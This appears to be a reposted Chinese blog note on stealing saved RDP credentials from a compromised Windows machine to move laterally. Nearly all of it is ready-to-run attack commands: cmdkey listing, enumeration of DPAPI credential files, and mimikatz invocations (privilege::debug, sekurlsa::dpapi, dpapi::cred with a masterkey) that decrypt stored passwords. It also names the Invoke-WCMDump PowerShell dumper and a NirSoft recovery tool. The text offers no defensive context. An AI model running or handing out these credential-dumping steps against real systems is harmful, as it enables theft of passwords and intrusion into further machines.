RDP凭据获取继续横向
作者:互联网
RDP凭据获取继续横向
文章目录
猕猴桃获取密码
有可能这台机器保存登录其他机器rdp
#查看mstsc的连接纪录
cmdkey /list
#查找本地的Credentials:
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
如果存在,可以使用mimikatz
记录这个值
mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\9D26EE720EDC4D95AF94298895D92FA9"
执行找到guidMasterKey值对应的guid下的MasterKer值
mimikatz.exe "privilege::debug" "sekurlsa::dpapi" >1.txt
mimikatz.exe "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\9D26EE720EDC4D95AF94298895D92FA9 /masterkey:9d112cafdfc47142e80b38fecc3c9738ff844db85ce15e2e035f21c7727a76334c725a16942df1769a0ece1e68c7aeb6a484a877d538494201029be8d7914213"
破解密码,登录机器
network password
下载地址:https://www.nirsoft.net/utils/network_password_recovery.html
通过powershell脚本
下载地址:https://github.com/peewpw/Invoke-WCMDump
Import-Module .\Invoke-WCMDump.ps1
Invoke-WCMDump
也可以直接cs使用
标签:dpapi,RDP,AppData,凭据,横向,mimikatz,Credentials,Local,network 来源: https://blog.csdn.net/weixin_43227251/article/details/116455619